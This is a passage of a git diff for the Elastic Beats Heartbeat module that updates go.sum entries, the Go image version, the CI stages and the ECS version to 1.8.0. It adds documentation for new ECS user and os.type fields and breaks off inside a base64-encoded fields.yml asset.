-github.com/reviewdog/errorformat v0.0.0-20200109134752-8983be9bc7dd/go.mod h1:giYAXnpegRDPsXUO7TRpDKXJo1lFGYxyWRfEt5iQ+OA= -github.com/reviewdog/reviewdog v0.9.17 h1:MKb3rlQZgkEXr3d85iqtYNITXn7gDJr2kT0IhgX/X9A= -github.com/reviewdog/reviewdog v0.9.17/go.mod h1:Y0yPFDTi9L5ohkoecJdgbvAhq+dUXp+zI7atqVibwKg= github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/russross/blackfriday v1.5.2 h1:HyvC0ARfnZBqnXwABFeSZHpKvJHJJfPz81GNueLj0oo= @@ -752,8 +729,6 @@ github.com/urso/sderr v0.0.0-20200210124243-c2a16f3d43ec/go.mod h1:Wp40HwmjM59Fk github.com/vbatts/tar-split v0.11.1/go.mod h1:LEuURwDEiWjRjwu46yU3KVGuUdVv/dcnpcEPSzR8z6g= github.com/vmware/govmomi v0.0.0-20170802214208-2cad15190b41 h1:NeNpIvfvaFOh0BH7nMEljE5Rk/VJlxhm58M41SeOD20= github.com/vmware/govmomi v0.0.0-20170802214208-2cad15190b41/go.mod h1:URlwyTFZX72RmxtxuaFL2Uj3fD1JTvZdx59bHWk6aFU= -github.com/xanzy/go-gitlab v0.22.3 h1:/rNlZ2hquUWNc6rJdntVM03tEOoTmnZ1lcNyJCl0WlU= -github.com/xanzy/go-gitlab v0.22.3/go.mod h1:t4Bmvnxj7k37S4Y17lfLx+nLqkf/oQwT2HagfWKv5Og= github.com/xdg/scram v0.0.0-20180814205039-7eeb5667e42c h1:u40Z8hqBAAQyv+vATcGgV0YCnDjqSL7/q/JyPhhJSPk= github.com/xdg/scram v0.0.0-20180814205039-7eeb5667e42c/go.mod h1:lB8K/P019DLNhemzwFU4jHLhdvlE6uDZjXFejJXr49I= github.com/xdg/stringprep v1.0.0 h1:d9X0esnoa3dFsV0FG35rAT0RIhYFlPq7MiP+DW89La0= @@ -839,7 +814,6 @@ golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20181108082009-03003ca0c849/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20181201002055-351d144fa1fc/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= @@ -857,7 +831,6 @@ golang.org/x/net v0.0.0-20191002035440-2ec189313ef0/go.mod h1:z5CRVTTTmAJ677TzLL golang.org/x/net v0.0.0-20191021144547-ec77196f6094/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20191112182307-2180aed22343/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= golang.org/x/net v0.0.0-20200707034311-ab3426394381 h1:VXak5I6aEWmAXeQjA+QSZzlgNrpq9mjcfDemuexIKsU= @@ -865,7 +838,6 @@ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81R golang.org/x/net v0.0.0-20200904194848-62affa334b73 h1:MXfv8rhZWmFeqX3GNZRsd6vOLoaCHjYEX3qkRo3YBUA= golang.org/x/net v0.0.0-20200904194848-62affa334b73/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= -golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190130055435-99b60b757ec1/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -944,7 +916,6 @@ google.golang.org/api v0.15.0 h1:yzlyyDW/J0w8yNFJIhiAJy4kq74S+1DOLdawELNxFMA= google.golang.org/api v0.15.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.2.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/appengine v1.3.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.6.1/go.mod h1:i06prIuMbXzDqacNJfV5OdTW448YApPu5ww/cMBSeb0= diff --git a/heartbeat/Dockerfile b/heartbeat/Dockerfile index 51c2b06d485f..ed2c4d109186 100644 --- a/heartbeat/Dockerfile +++ b/heartbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/heartbeat/Jenkinsfile.yml b/heartbeat/Jenkinsfile.yml index de73acd5be79..8c1bbeaa574d 100644 --- a/heartbeat/Jenkinsfile.yml +++ b/heartbeat/Jenkinsfile.yml @@ -80,3 +80,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/heartbeat/cmd/root.go b/heartbeat/cmd/root.go index d7b499afdcac..bfbfa22d1b46 100644 --- a/heartbeat/cmd/root.go +++ b/heartbeat/cmd/root.go @@ -41,7 +41,7 @@ const ( Name = "heartbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/heartbeat/docs/fields.asciidoc b/heartbeat/docs/fields.asciidoc index f574c6400c43..1588c1596e15 100644 --- a/heartbeat/docs/fields.asciidoc +++ b/heartbeat/docs/fields.asciidoc @@ -2186,7 +2186,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2239,7 +2239,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3430,6 +3430,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4504,6 +4517,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4674,6 +4700,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7825,6 +7864,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -8000,6 +8040,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -8010,6 +8163,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -8113,6 +8379,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8229,6 +8608,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/heartbeat/include/fields.go b/heartbeat/include/fields.go index d224f8a00458..8c5c30dcb6bc 100644 --- a/heartbeat/include/fields.go +++ b/heartbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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